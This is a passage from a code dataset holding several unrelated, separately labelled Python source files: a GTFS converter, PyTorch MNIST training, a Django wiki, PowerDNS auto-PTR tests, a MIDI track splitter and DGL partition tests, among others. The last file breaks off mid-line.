route_short_name = 'Lautta'\n route_type = '4'\n else:\n route_short_name = route[1:].lstrip('0')\n route_type = '3'\n writer.writerow({'route_id': route, 'route_short_name': route_short_name, 'route_type': route_type,'agency_id': 'HSL'})\n\n\nwith open('gtfs/trips.txt', 'w') as csvfile:\n fieldnames = ['route_id', 'service_id', 'trip_id', 'direction_id', 'trip_headsign', 'shape_id']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for trip in trip_objs.values():\n writer.writerow(trip)\n\nwith open('gtfs/stop_times.txt', 'w') as csvfile:\n fieldnames = ['trip_id', 'stop_id', 'arrival_time', 'departure_time', 'stop_sequence', 'timepoint']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for stoptime in stoptimes:\n writer.writerow(stoptime)\n\nwith open('gtfs/missing_stops.txt', 'w') as csvfile:\n fieldnames = ['stop_id']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for stop in missing_stops:\n writer.writerow({'stop_id': stop})\n","repo_name":"HSLdevcom/hastus2gtfs","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5935,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"73793534561","text":"\nfrom models import BasicModel, LocalEnvironment\nfrom torch.utils.data import DataLoader, Dataset\nfrom typing import Tuple \nfrom torchvision import datasets,transforms\nimport torch\nimport torch.nn.functional as F\n\n#模块搭建\nclass ResBlock(torch.nn.Module):\n def __init__(self,channels_in):\n super().__init__()\n self.conv1=torch.nn.Conv2d(channels_in,30,5,padding=2)\n self.conv2=torch.nn.Conv2d(30,channels_in,3,padding=1)\n\n def forward(self,x):\n out=self.conv1(x)\n out=self.conv2(out)\n return F.relu(out+x)\n\nclass ResNetMNIST(BasicModel):\n \n def __init__(self, local_num_epoch=5) -> None:\n super().__init__(local_num_epoch)\n self.conv1=torch.nn.Conv2d(1,20,5)\n self.conv2=torch.nn.Conv2d(20,15,3)\n self.maxpool=torch.nn.MaxPool2d(2)\n self.resblock1=ResBlock(channels_in=20)\n self.resblock2=ResBlock(channels_in=15)\n self.full_c=torch.nn.Linear(375,10)\n\n def client_init(self, env: LocalEnvironment):\n super().client_init(env)\n env.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n \n \n def forward(self, x):\n size=x.shape[0]\n x=F.relu(self.maxpool(self.conv1(x)))\n x=self.resblock1(x)\n x=F.relu(self.maxpool(self.conv2(x)))\n x=self.resblock2(x)\n x=x.view(size,-1)\n x=self.full_c(x)\n return x\n \n \n def get_dataloader(self) -> Tuple[DataLoader]:\n batch = 100\n trans=transforms.Compose([transforms.ToTensor(),transforms.Normalize(0.15,0.30)])\n train_set=datasets.MNIST(\"~/datasets/MNIST\",train=True,download=True,transform=trans)\n train_loader=DataLoader(train_set,batch_size=batch,shuffle=True,num_workers=4)\n test_set=datasets.MNIST(\"~/datasets/MNIST\", train=False,download=True,transform=trans)\n test_loader=DataLoader(test_set,batch_size=batch,num_workers=4)\n return train_loader, test_loader\n\n \n def local_train(self, env: LocalEnvironment):\n criterion=torch.nn.CrossEntropyLoss()\n optimizer=torch.optim.Adam(self.parameters(),lr=0.005)\n scheduler=torch.optim.lr_scheduler.ExponentialLR(optimizer,gamma=0.999)\n data_size = 0\n for epoch in range(self.local_num_epoch):\n for batch_index,data in enumerate(env.train_loader,0):\n l=0.0\n data_size += len(data)\n train_data,train_labels=data\n train_data, train_labels = train_data.to(env.device), 
train_labels.to(env.device)\n optimizer.zero_grad()\n pred_data=self.forward(train_data)\n loss=criterion(pred_data,train_labels)\n loss.backward()\n l+=loss.item()\n optimizer.step()\n scheduler.step()\n if batch_index%100==0:\n print(\"epoch:\",epoch,\"batch_index:\",batch_index/100,\"loss:\",l)\n self.data_size =data_size\n \n \n def test(self, env: LocalEnvironment):\n\n eval_msg = \"\"\n with torch.no_grad():\n correct=0.0\n total=0.0\n for batch_index,data in enumerate(env.test_loader,0):\n test_data,test_labels=data\n test_data, test_labels = test_data.to(env.device), test_labels.to(env.device)\n pred_data=self.forward(test_data)\n _,pred_labels=torch.max(pred_data,dim=1)\n total+=test_labels.shape[0]\n correct+=(pred_labels==test_labels).sum().item()\n if batch_index%10==0:\n eval_msg += f\"测试进度: {100.0*batch_index/100} %\\n\"\n eval_msg += f\"准确率为: {correct*100.0/total} %\\n\"\n return eval_msg\n \n def save(self):\n \n return super().save()\n \n \nclass ResNetCIFAR10(BasicModel):\n \n def __init__(self, local_num_epoch=5) -> None:\n super().__init__(local_num_epoch)\n \n def get_dataloader(self) -> Tuple[DataLoader]:\n return super().get_dataloader()\n \n def local_train(self, env: LocalEnvironment) -> int:\n return super().local_train(env)\n \n def test(self, env: LocalEnvironment):\n return super().test(env)","repo_name":"yzzer123/FedRaft","sub_path":"Trainer/models/Examples.py","file_name":"Examples.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20940785277","text":"# ## Exercise 1\n# 1. Create a python file with 3 functions:\n# 1. `def print_file_content(file)` that can print content of a csv file to the console\n# 2. `def write_list_to_file(output_file, lst)` that can take a list of tuple and write each element to a new line in file\n# 1. rewrite the function so that it gets an arbitrary number of strings instead of a list\n# 3. `def read_csv(input_file)` that take a csv file and read each row into a list\n# 2. Add a functionality so that the file can be called from cli with 2 arguments\n# 1. path to csv file\n# 2. an argument `--file file_name` that if given will write the content to file_name or otherwise will print it to the console.\n# 3. Add a --help cli argument to describe how the module is used\nfrom PythonProjects.utils import webget\nimport argparse\nimport csv\n\n\ndef print_file_content(file):\n \"\"\"1. 
`def print_file_content(file)` that can print content of a csv file to the console\"\"\"\n # It should be able to print content of a csv file to console.\n\n with open(file) as f:\n reader = csv.reader(f)\n\n for row in reader:\n print(str(row))\n\n# testing 1.\n# filename = './iris_csv.csv'\n# print_file_content(filename)\n# ^Works\n\n\ndef write_list_to_file(output_file, *args):\n \"\"\"`def write_list_to_file(output_file, lst)` \n that can take a list of tuple \n and write each element to a new line in file\"\"\"\n # rewrite the function so that it gets an arbitrary number of strings instead of a list\n\n toFile = \"\"\n for x in args:\n toFile += x + \"\\n\"\n\n with open(output_file, 'w') as file_object:\n print(\"Writing {} to {}\".format(toFile, output_file))\n file_object.write(toFile)\n\n\n# Testing write_list_to_file\n# testStringOne = \"First Line\"\n# testStringTwo = \"Second Line\"\n# testStringThree = \"Third Line\"\n\n# filename = \"testFile.txt\"\n\n# print(\"\\n___________________________________________\\nSecond Test::\\n\")\n# write_list_to_file(filename, testStringOne, testStringTwo, testStringThree)\n# ^Works\n\n# `def read_csv(input_file)` that take a csv file and read each row into a list\n\n\ndef read_csv(input_file):\n list = []\n with open(input_file) as f:\n reader = csv.reader(f)\n\n for row in reader:\n list.append(row)\n\n return list\n\n\n# print(\"\\n___________________________________________\\nThird Test::\\n\")\n# filename = \"iris_csv.csv\"\n# print(read_csv(filename))\n\n# 2. Add a functionality so that the file can be called from cli with 2 arguments\n# 1. path to csv file\n# 2. an argument `--file file_name` that if given will write the content to file_name or otherwise will print it to the console.\n# Add a --help cli argument to describe how the module is used\nparser = argparse.ArgumentParser(\n description='A program that can handle CSV')\n\n# Positional arg\nparser.add_argument('path', help='path to csv file')\n\n# Optional Arg [- , --]\nparser.add_argument('-f', '--file_name',\n help='if given will write the content to file_name or otherwise will print it to the console.')\n\n\nargs = parser.parse_args()\n\n\ndef listToString(s):\n str1 = \",\"\n return (str1.join(s))\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n\n path = args.path\n\n myContent = read_csv(path)\n\n content = \"\"\n\n for x in myContent:\n content += listToString(x) + \"\\n\"\n\n if (args.file_name != None):\n file_name = args.file_name\n # write the content to file_name\n with open(file_name, 'w') as file_object:\n\n print(\"Writing {} to {}\".format(content, file_name))\n file_object.write(content)\n else:\n # Print it to console\n print_file_content(path)\n","repo_name":"MalteMagnussen/PythonProjects","sub_path":"week2/Exercises/one.py","file_name":"one.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31169787218","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'HentaiSaru'\n\nfrom cx_Freeze import setup, Executable\nimport sys\n\nbase = None\nif sys.platform == \"win32\":\n base = \"Win32GUI\"\n\nsetup(name='DriverDetection',\n version='1.0',\n description='update detection',\n options={\"build_exe\": {\"includes\": [\"lxml.etree\", \"requests\", \"GPUtil\", \"re\", \"os\", \"tkinter.messagebox\"]}},\n executables=[Executable(\"GPU_UpdateReminder.pyw\", base=base ,icon=\"nvidia.ico\")]\n 
)","repo_name":"TenshinoOtoKafu/Implementation-Project","sub_path":"python Implementation/顯卡驅動更新提醒/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1585769778","text":"def solution(s):\n answer = []\n\n n=[]\n for i in range(len(s)):\n if s[i] in n:\n answer.append(i-s[:i].rindex(s[i]))\n else:\n n.append(s[i])\n answer.append(-1)\n\n return answer","repo_name":"Mindlestick/CodingTest","sub_path":"Programmers/가장 가까운 같은 글자.py","file_name":"가장 가까운 같은 글자.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19469729123","text":"from django.urls import path\n\nfrom dark.views.user import UserRegistrationView, UserLoginView, UserLogoutView\n\n\nclass UserSite:\n def get_urls(self):\n urlpatterns = [\n path('register/', UserRegistrationView.as_view(), name='register'),\n path('login/', UserLoginView.as_view(template_name='dark/user/login.html'), name='login'),\n path('logout/', UserLogoutView.as_view(template_name='dark/user/logout.html'), name='logout'),\n ]\n\n return urlpatterns\n\n @property\n def urls(self):\n return self.get_urls(), 'user', 'user'\n\n\nsite = UserSite()\n","repo_name":"DARK-development-team/DARK","sub_path":"dark/urls/user/sites.py","file_name":"sites.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41428710162","text":"import MDAnalysis\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport Analyze_file_info\nimport pandas as pd\nfrom cycler import cycler\ndef plot_axes(x, y, ax, **kwargs):\n \"\"\"plot two arrays with a certain style in the current axes\"\"\"\n return None\n\ndef get_temp_arrays_from_file(**kwargs):\n \"\"\"plots arrays from a parameter file\"\"\"\n return None\n\ndef get_cmap(n, name='hsv'):\n '''Returns a function that maps each index in 0, 1, ..., n-1 to a distinct\n RGB color; the keyword argument name must be a standard mpl colormap name.\n\n Args:\n n (TYPE): Description\n name (str, optional): Description\n\n Returns:\n TYPE: Description\n '''\n return plt.cm.get_cmap(name, n)\n\n\n\n# for myfile in fileslist:\n # get arrays using get_temp_arrays_from_file\n # finish everything\n\n # folder = '/Users/bazilevs/Work/cedar/17-12-08/rerun_profiles/'\nfolder = '/Users/bazilevs/Work/cedar/18-06-12_energy_density_curves/'\n\n# entypelist = [ 'gelpair', 'allpair', 'cipair']\nentypelist = ['cipair']\n# for simtype in ['coul', 'total', 'lj']:\n# for simtype in ['coul', 'lj']:\n# for entype in entypelist:\n# print( simtype)\n# plot_energy_for_type(folder, myenergytype=entype, simtype=simtype)\nsimtype = 'cipair'\ntemp_name_array = ['01','02','03','04','05','06','07','08','09','10','11']\ntemp_color_array = get_cmap(len(temp_name_array))\ngelname = 'sc1844_nm100_l50_fl01_fr1'\n# params_dict = vars(args)\nmyenergytype = 'coul'\nparams = {\n'folder' : folder,\n'energytype' : myenergytype,\n'gelname' : gelname,\n'simtype' : simtype,\n'scale_power' : 3,\n}\nscale_factor = 10.**params['scale_power']\n\n# get_cmap\n# frho = plt.figure(1)\n# fz = plt.figure(2)\n# # fz.clf()\n# frho.clf()\n# axrho = frho.add_subplot(111)\n\n# axz1 = fz.add_subplot(211)\n# axz2 = fz.add_subplot(212)\n\n# if simtype is 'coul':\n# axz = axz1\n# else:\n# axz = axz2\ncc = (cycler(color=list('rgb')) *\n cycler(linestyle=['-', '--', '-.']))\n\nfor 
_tname in temp_name_array:\n params['tempname'] = _tname\n mystring = \"{0[folder]}/{0[gelname]}_t{0[tempname]}.csv\".format(params)\n df = pd.read_csv(mystring)\n plt.plot(df['Coord1'], df['NumDensity_ci'])\n\nplt.show()\n # params_dict['temp_name_array'] = temp_name_array\n # params_dict['ax_dict'] = ax_dict\n # params_dict['fig_dict'] = fig_dict\n # for myfile in params_dict['myfiles_list']:\n # c = files_color_dict[myfile]\n # params_dict['myfile'] = myfile\n # temp_array, phi3_array_pure, conc_divide_array, f_divide_array, q1_q2_param_array, press_array,work_array, pzz_array, fillstyle = get_arrays_from_file(**params_dict)\n","repo_name":"bazilevs31/pygels","sub_path":"analyze/archive/energy_density.py","file_name":"energy_density.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31432011173","text":"def prepareData():\n global deptList, studentList\n matrials = Dept(100,\"신소재\")\n mechanics = Dept(200,\"기계공학과\")\n deptList= [matrials, mechanics]\n studentList = []\n studentList.append(Student(101,\"신철수\",matrials))\n studentList.append(Student(102,\"신정철\",matrials))\n studentList.append(Student(201,\"기대승\",mechanics))\n studentList.append(Student(202,\"기정은\",mechanics))\n\nclass Dept:\n def __init__(self, deptNo, name):\n self.deptNo = deptNo\n self.name = name\n def __str__(self):\n result = \"(\"+str(self.deptNo) + \" \" + self.name+ \")\"\n return result\n \nclass Student:\n def __init__(self, studentNo, name, dept):\n self.studentNo = studentNo\n self.name = name\n self.dept = dept\n def __str__(self):\n result = \"(\"+str(self.studentNo) + \" \"\n result += self.name + \" \" + self.dept.name + \")\"\n return result\n\ndef main():\n prepareData()\n print(\"=\"*10,\"All Departments List\")\n for dept in deptList:\n print(dept)\n print(\"=\"*10,\"All Students List\")\n for student in studentList:\n print(student)\nmain()","repo_name":"parkjin7888/first-repository","sub_path":"practice_4.py","file_name":"practice_4.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36442329857","text":"from django.http.response import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django import forms\nfrom django.urls import reverse\nimport random\nimport markdown2\nfrom django.shortcuts import redirect\n\nfrom . 
import util\n\nclass NewPageForm(forms.Form):\n pageTitle = forms.CharField(label=\"Title\" )\n content = forms.CharField(widget=forms.Textarea, label=\"Content\")\n\nclass EditPage(forms.Form):\n text = forms.CharField(widget=forms.Textarea, initial='class', label=\"Content\")\n\n\ndef index(request):\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\n\ndef page(request, title):\n page = util.get_entry(title)\n \n if page == None:\n return render(request, \"encyclopedia\\error.html\")\n\n else:\n html = markdown2.markdown_path(f\"entries/{title}.md\")\n return render(request, \"encyclopedia/page.html\", {\n \"page\" : html,\n \"title\" : title\n })\n \n\ndef search(request):\n if request.method == \"POST\":\n q = request.POST['q'].casefold()\n\n entries = [x.casefold() for x in util.list_entries()]\n search_list = []\n\n if q in entries:\n q = request.POST['q']\n return redirect('title', title=q)\n\n else:\n for entry in util.list_entries():\n if (entry.casefold().find(q) != -1):\n search_list.append(entry)\n \n return render(request, \"encyclopedia/search.html\", {\n \"entries\": search_list\n })\n\ndef newPage(request):\n if request.method == \"GET\":\n return render(request, \"encyclopedia/newpage.html\", {\n \"form\": NewPageForm()\n })\n\n else:\n form = NewPageForm(request.POST)\n if form.is_valid():\n title = form.cleaned_data[\"pageTitle\"].casefold()\n content = form.cleaned_data[\"content\"]\n\n if title in [x.casefold() for x in util.list_entries()]:\n return render(request, \"encyclopedia/newpage.html\", {\n \"form\": form,\n \"error\" : \"Title already exists. Choose another title.\"\n })\n \n else:\n title = form.cleaned_data[\"pageTitle\"]\n util.save_entry(title, content)\n return redirect('title', title=title)\n\ndef randomPage(request):\n randomPage = random.choice(util.list_entries())\n return redirect('title', title=randomPage)\n\n\ndef editPage(request, title):\n if request.method == \"GET\":\n content = util.get_entry(title)\n return render(request, \"encyclopedia/edit.html\", {\n \"form\" : EditPage(initial={'text': content}),\n \"title\" : title\n })\n\n else:\n form = EditPage(request.POST)\n if form.is_valid():\n content = form.cleaned_data[\"text\"]\n util.save_entry(title, content)\n return redirect('title', title=title)\n ","repo_name":"abnlfazal/portfolio","sub_path":"wiki/encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14089691467","text":"import subprocess\nimport time\nimport argparse\nimport numpy as np\nimport os\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"output\")\n args = parser.parse_args()\n my_env = os.environ.copy()\n confs = []\n for i in [0.5, 0.9, 1.0, 1.1, 3.0]:\n for j in [0.5, 0.9, 1.0, 1.1, 3.0]:\n for k in [0.5, 0.9, 1.0, 1.1, 3.0]:\n confs.append((i, j, k))\n\n for index, (i, j, k) in enumerate(confs):\n print(\"{}/{}\".format(index, len(confs)))\n with open(args.output + \"{}_{}_{}.txt\".format(i, j, k), \"wb\") as fout:\n my_env[\"DALI_JIT_ALWAYS_RECOMPILE\"] = \"true\"\n my_env[\"DALI_JIT_THREAD_WEIGHT\"] = \"{}\".format(i)\n my_env[\"DALI_JIT_BLOCK_WEIGHT\"] = \"{}\".format(j)\n my_env[\"DALI_JIT_THREADBLOCK_WEIGHT\"] = \"{}\".format(k)\n out = subprocess.check_output(\"/home/jonathanraiman/Coding/dali-examples/build/mnist_training --device 0 --use_cudnn --use_jit_fusion --epochs 3\".split(),\n 
env=my_env)\n fout.write(out)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dali-ml/dali-examples","sub_path":"examples/run_many_confs.py","file_name":"run_many_confs.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72313195360","text":"\"\"\"Tests for auto_ptr feature\"\"\"\n\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase\n\nfrom powerdns.models.powerdns import Domain, Record\nfrom powerdns.tests.utils import (\n DomainFactory,\n DomainTemplateFactory,\n RecordFactory,\n RecordTemplateFactory,\n assert_does_exist,\n assert_not_exists,\n)\nfrom powerdns.utils import AutoPtrOptions\n\n\nclass TestAutoPtr(TestCase):\n \"\"\"Tests for auto_ptr feature\"\"\"\n\n def setUp(self):\n self.user = User.objects.create_superuser(\n 'user', 'user1@example.com', 'password'\n )\n self.reverse_template = DomainTemplateFactory(name='reverse')\n self.alt_reverse_template = DomainTemplateFactory(name='reverse 2')\n self.soa_record = RecordTemplateFactory(\n type='SOA',\n name='{domain-name}',\n content=(\n 'ns1.{domain-name} hostmaster.{domain-name} '\n '0 43200 600 1209600 600'\n ),\n domain_template = self.reverse_template,\n )\n self.alt_soa_record = RecordTemplateFactory(\n type='SOA',\n name='{domain-name}',\n content=(\n 'nameserver1.{domain-name} hostmaster.{domain-name} '\n '0 43200 1200 1209600 1200'\n ),\n domain_template = self.alt_reverse_template,\n )\n self.domain = DomainFactory(\n name='example.com',\n template=None,\n reverse_template=None,\n type='NATIVE',\n )\n\n def tearDown(self):\n for Model in [Domain, Record, User]:\n Model.objects.all().delete()\n\n def test_default_ptr_created(self):\n \"\"\"A PTR record is created for an A record with default template\"\"\"\n RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ALWAYS,\n owner=self.user,\n )\n domain = Domain.objects.get(name='1.168.192.in-addr.arpa')\n self.assertEqual(domain.type, 'NATIVE')\n self.assertTrue(domain.get_soa().content.endswith('600'))\n assert_does_exist(\n Record,\n domain=domain,\n name='1.1.168.192.in-addr.arpa',\n owner=self.user,\n )\n\n def test_auto_ptr_edit(self):\n \"\"\"PTR changes when A changes\"\"\"\n record = RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ALWAYS,\n )\n record.content = '192.168.1.9'\n record.save()\n domain = Domain.objects.get(name='1.168.192.in-addr.arpa')\n assert_does_exist(\n Record,\n domain=domain,\n name='9.1.168.192.in-addr.arpa',\n )\n assert_not_exists(\n Record,\n domain=domain,\n name='1.1.168.192.in-addr.arpa',\n )\n\n def test_auto_ptr_off(self):\n \"\"\"PTR is removed when setting auto_ptr to NEVER\"\"\"\n record = RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ALWAYS,\n )\n domain = Domain.objects.get(name='1.168.192.in-addr.arpa')\n record.auto_ptr = AutoPtrOptions.NEVER\n record.save()\n assert_not_exists(\n Record,\n domain=domain,\n name='1.1.168.192.in-addr.arpa',\n )\n\n def test_default_ptr_never(self):\n \"\"\"A PTR record is not created if auto_ptr set to NEVER\"\"\"\n domain = DomainFactory(name='1.168.192.in-addr.arpa')\n RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.NEVER,\n )\n 
assert_not_exists(\n Record,\n domain=domain,\n name='1.1.168.192.in-addr.arpa'\n )\n\n def test_ptr_domain_exists(self):\n \"\"\"A PTR record with 'only-if-domain' is created if domain exists\"\"\"\n domain = DomainFactory(name='1.168.192.in-addr.arpa')\n RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ONLY_IF_DOMAIN,\n )\n assert_does_exist(\n Record,\n domain=domain,\n name='1.1.168.192.in-addr.arpa'\n )\n\n def test_ptr_domain_not_exists(self):\n \"\"\"A PTR record with 'only-if-domain' is created if domain exists\"\"\"\n RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ONLY_IF_DOMAIN,\n )\n assert_not_exists(\n Record,\n name='1.1.168.192.in-addr.arpa'\n )\n\n def test_alt_ptr_created(self):\n \"\"\"A PTR record is created for an A record with alternative\"\"\"\n self.domain.reverse_template = self.alt_reverse_template\n RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ALWAYS,\n )\n domain = Domain.objects.get(name='1.168.192.in-addr.arpa')\n self.assertTrue(domain.get_soa().content.endswith('1200'))\n\n def test_ptr_autoremove(self):\n \"\"\"A PTR record is automatically removed with its A record\"\"\"\n a = RecordFactory(\n domain=self.domain,\n type='A',\n name='site.example.com',\n content='192.168.1.1',\n auto_ptr=AutoPtrOptions.ALWAYS,\n )\n assert_does_exist(Record, name='1.1.168.192.in-addr.arpa', type='PTR')\n a.delete()\n assert_not_exists(Record, name='1.1.168.192.in-addr.arpa', type='PTR')\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/allegro/django-powerdns-dnssec/powerdns/tests/test_auto_ptr.py","file_name":"test_auto_ptr.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34622604031","text":"import pygame\nimport numpy as np\nimport cv2 as cv\nfrom scripts.core.node_detail import NodeDetail\n\nclass BSInvert(NodeDetail):\n def __init__(self, color_bg: pygame.Color, image: np.matrix) -> None:\n self.node_name = \"Invert\"\n self.color_bg = color_bg\n self.size_panel_config = pygame.Rect(0, 0, 100, 30)\n super().__init__(self.node_name, self.color_bg, image)\n\n def __apply_effect(self):\n self.image_apply = cv.bitwise_not(self.image_apply)\n \n if self.image_apply.ndim < 3:\n self.image_display = cv.cvtColor(self.image_apply.copy(), cv.COLOR_GRAY2RGB)\n else:\n self.image_display = self.image_apply.copy()\n \n def set_image(self, image_cv: np.matrix) -> None:\n self.image_raw = image_cv.copy()\n self.image_apply = image_cv.copy()\n self.image_display = image_cv.copy()\n self.__apply_effect()\n super().set_image(image_cv)\n \n def set_params(self):\n pass","repo_name":"kiritoroo/node-opencv-explor","sub_path":"scripts/factory/base/bs_invert.py","file_name":"bs_invert.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13462353872","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\ndef bishop(idx,cnt,color):\r\n if idx == 2 * n:\r\n ans[color] = max(ans[color],cnt)\r\n return\r\n for x,y in board[color][idx]:\r\n if used[color][x + y]:\r\n continue\r\n used[color][x+y] = True\r\n bishop(idx + 1, cnt + 1, color)\r\n used[color][x+y] = False\r\n bishop(idx + 1, cnt, color)\r\n \r\nn = int(input())\r\nans = 
[0,0]\r\nboard = [[[] for _ in range(2 * n) ] for _ in range(2)]\r\nused = [[False] * (2 * n) for _ in range(2)]\r\nfor r in range(n):\r\n inp = list(map(int,input().split()))\r\n for c,v in enumerate(inp):\r\n if v == 1:\r\n # \\ 방향 대각선\r\n board[(r + c + 1) % 2][n + r - c - 1].append((r,c)) \r\n\r\nbishop(0,0,0)\r\nbishop(0,0,1)\r\n\r\nprint(sum(ans))","repo_name":"yootal/CodingTest","sub_path":"백준/Gold/1799. 비숍/비숍.py","file_name":"비숍.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28597784202","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Nissimol Aji\n\"\"\"\n\nimport os\nfrom mido import MidiFile,MidiTrack\n\n\n'''\n\nMidiSplit class, splits the midi files into individual midi file track\n'''\nclass MidiSplit:\n \n def split_midi_tracks(midi_file,output_path):\n try:\n file=os.path.basename(midi_file)\n file_name = os.path.splitext(file)[0]\n mid = MidiFile(midi_file,clip=True)\n path = output_path + str(file_name)\n os.mkdir(path) \n original_channel = MidiFile()\n original_channel.ticks_per_beat=mid.ticks_per_beat\n \n channel_present = False\n channel_absent =False\n count =0 \n for i,track in enumerate(mid.tracks): \n \n if len(track.name) == 0:\n track.name = \"piano track \"+str(count)\n count = count+1\n print('Track {}: {}'.format(i, track.name))\n \n \n\n instrument_channel = MidiFile() # getting the current track\n instrument_channel.ticks_per_beat = mid.ticks_per_beat\n \n for msg in track:\n if msg.is_meta ==False:\n try:\n if msg.channel >=0:\n channel_absent = False\n channel_present = True\n break\n else:\n channel_present = False\n except:\n channel_present=False\n else:\n channel_present =False\n if channel_present ==True:\n instrument_channel.tracks.append(track)\n original_channel.tracks.append(track)\n \n instrument_channel.save(output_path+'/'+str(file_name) +'/'+str(track.name)+ '.mid')\n original_channel.save(output_path+'/'+str(file_name) +'/'+ str(file_name)+ '.mid')\n \n return path,mid \n except:\n print(\"Mid file does not contains track names or the channels are not in chronological order\")","repo_name":"nissimanjayil/Investigating-melody-complexity-in-polyphonic-music","sub_path":"Computational analysis/Saliency based model/MidiSplit.py","file_name":"MidiSplit.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71587585121","text":"import json\nimport os\nimport tempfile\nfrom collections import Counter\n\nimport dgl\n\nimport pytest\nfrom change_etype_to_canonical_etype import convert_conf, is_old_version\nfrom dgl.distributed import partition_graph\nfrom scipy import sparse as spsp\n\n\ndef create_random_hetero(type_n, node_n):\n num_nodes = {}\n for i in range(1, type_n + 1):\n num_nodes[f\"n{i}\"] = node_n\n c_etypes = []\n count = 0\n for i in range(1, type_n):\n for j in range(i + 1, type_n + 1):\n count += 1\n c_etypes.append((f\"n{i}\", f\"r{count}\", f\"n{j}\"))\n edges = {}\n for etype in c_etypes:\n src_ntype, _, dst_ntype = etype\n arr = spsp.random(\n num_nodes[src_ntype],\n num_nodes[dst_ntype],\n density=0.001,\n format=\"coo\",\n random_state=100,\n )\n edges[etype] = (arr.row, arr.col)\n return dgl.heterograph(edges, num_nodes), [\n \":\".join(c_etype) for c_etype in c_etypes\n ]\n\n\n@pytest.mark.parametrize(\n \"type_n, node_n, num_parts\", [[3, 100, 2], [10, 500, 4], [10, 1000, 8]]\n)\ndef 
test_hetero_graph(type_n, node_n, num_parts):\n g, expected_c_etypes = create_random_hetero(type_n, node_n)\n do_convert_and_check(g, \"convert_conf_test\", num_parts, expected_c_etypes)\n\n\n@pytest.mark.parametrize(\"node_n, num_parts\", [[100, 2], [500, 4]])\ndef test_homo_graph(node_n, num_parts):\n g = dgl.rand_graph(node_n, node_n // 10)\n do_convert_and_check(g, \"convert_conf_test\", num_parts, [\"_N:_E:_N\"])\n\n\ndef do_convert_and_check(g, graph_name, num_parts, expected_c_etypes):\n with tempfile.TemporaryDirectory() as root_dir:\n partition_graph(g, graph_name, num_parts, root_dir)\n part_config = os.path.join(root_dir, graph_name + \".json\")\n old_config = _get_old_config(part_config)\n # Call convert function\n convert_conf(part_config)\n with open(part_config, \"r\") as config_f:\n config = json.load(config_f)\n # Check we get all canonical etypes\n assert Counter(expected_c_etypes) == Counter(\n config[\"etypes\"].keys()\n )\n # Check the id is match after transform from etypes -> canonical\n assert old_config[\"etypes\"] == _extract_etypes(config[\"etypes\"])\n\n\ndef _get_old_config(part_config):\n with open(part_config, \"r+\") as config_f:\n config = json.load(config_f)\n if not is_old_version(config):\n config[\"etypes\"] = _extract_etypes(config[\"etypes\"])\n config[\"edge_map\"] = 